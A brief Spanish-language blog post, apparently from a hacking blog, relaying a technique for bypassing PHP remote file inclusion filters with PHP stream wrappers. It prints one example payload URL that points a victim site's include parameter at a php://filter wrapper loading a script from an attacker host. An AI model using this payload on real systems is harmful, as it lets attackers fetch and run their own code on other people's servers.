Personal information:

A Coruña, Galicia, Spain

sábado, 17 de abril de 2010

Bypasseando filtros RFI PHP 5.0.0

Hace nada he leído en undersecurity.net (http://foro.undersecurity.net/read.php?15,7047,7047#msg-7047) una entrada escrita por Seth, en la que nos explica una manera novedosa de evitar los filtros programados en las web PHP (>=5.0.0) para contrarrestar la inclusión remota de archivos.
La técnica consiste en las envolturas PHP, o PHP Wrappers (http://us2.php.net/manual/en/wrappers.php.php), dandoles el uso visto en el post de Seth, tal que:

http://victima.com/inc.php?page=php://filter/resource=http://atacante.com/rfi.php?

Un aplauso para Seth ;).

-H4ppyH4ck1n9-